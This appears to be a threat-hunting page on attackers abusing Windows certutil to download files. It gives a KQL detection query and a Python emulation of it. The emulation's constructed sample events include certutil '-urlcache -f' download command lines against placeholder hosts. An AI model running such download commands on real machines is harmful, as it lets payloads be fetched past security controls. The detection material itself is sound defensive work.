redttps

Certutil download

Introduction

Certutil is a legitimate command-line utility included in Windows for managing certificates. However, attackers often abuse certutil as a living-off-the-land binary (LOLBin) to download malicious files or exfiltrate data without triggering traditional security alerts. Using certutil to download files allows threat actors to bypass some security controls by blending in with normal system activity.

KQL

DeviceProcessEvents
| where FileName == "certutil.exe"
// certutil's download form is "-urlcache -f <URL>". has_all/has_any match whole
// terms case-insensitively, so the term "http" alone would not match https URLs.
| where ProcessCommandLine has_all ("urlcache", "-f")
    and ProcessCommandLine has_any ("http", "https")
| project-reorder Timestamp, ProcessCommandLine, FileName, InitiatingProcessAccountUpn
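As an added example (not part of this page or of any vendor's code), the same detection run in Python over constructed DeviceProcessEvents-style rows: the term matching is a simplified model of KQL's whole-term, case-insensitive `has`, and the scheme check covers http and https explicitly, since a whole-term match on "http" does not cover https URLs.

```python
"""Emulate the certutil download query over constructed DeviceProcessEvents rows."""
import re

# Constructed sample rows, not real telemetry; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"Timestamp": "2024-01-01T10:00:00Z", "FileName": "certutil.exe",
     "ProcessCommandLine": "certutil.exe -urlcache -split -f http://files.example.invalid/a.bin a.bin",
     "InitiatingProcessAccountUpn": "alice@example.invalid"},
    {"Timestamp": "2024-01-01T10:01:00Z", "FileName": "certutil.exe",   # upper case, slash switches
     "ProcessCommandLine": "CERTUTIL.EXE /URLCACHE /F HTTP://files.example.invalid/b.bin b.bin",
     "InitiatingProcessAccountUpn": "bob@example.invalid"},
    {"Timestamp": "2024-01-01T10:02:00Z", "FileName": "certutil.exe",   # https: "http" term absent
     "ProcessCommandLine": "certutil.exe -urlcache -f https://files.example.invalid/c.bin c.bin",
     "InitiatingProcessAccountUpn": "carol@example.invalid"},
    {"Timestamp": "2024-01-01T10:03:00Z", "FileName": "certutil.exe",   # benign certificate check
     "ProcessCommandLine": "certutil.exe -verify -urlfetch signed.cer",
     "InitiatingProcessAccountUpn": "dave@example.invalid"},
    {"Timestamp": "2024-01-01T10:04:00Z", "FileName": "powershell.exe",  # right words, wrong image
     "ProcessCommandLine": 'powershell.exe -c "echo http urlcache -f"',
     "InitiatingProcessAccountUpn": "erin@example.invalid"},
]

_TERM = re.compile(r"[a-z0-9]+")

def terms(text):
    """Whole alphanumeric terms, lower-cased: a simplified model of KQL `has`."""
    return set(_TERM.findall(text.lower()))

def has_all(text, wanted):
    """Every wanted term (tokenised the same way, so "-f" becomes "f") is present."""
    return all(terms(w) <= terms(text) for w in wanted)

def has_any(text, wanted):
    return any(terms(w) <= terms(text) for w in wanted)

def detect(events, schemes=("http", "https")):
    """Rows the query would return; FileName uses `==`, which is case-sensitive in KQL too."""
    hits = []
    for ev in events:
        if ev["FileName"] != "certutil.exe":
            continue
        cmd = ev["ProcessCommandLine"]
        if has_all(cmd, ["urlcache", "-f"]) and has_any(cmd, schemes):
            # project-reorder: the query's columns first, in its order
            cols = ("Timestamp", "ProcessCommandLine", "FileName", "InitiatingProcessAccountUpn")
            hits.append({k: ev[k] for k in cols})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["Timestamp"], hit["InitiatingProcessAccountUpn"], hit["ProcessCommandLine"])
```

Calling `detect(SAMPLE_EVENTS, schemes=("http",))` reproduces a query that checks only the "http" term and drops the https row, which is the gap the explicit scheme list closes.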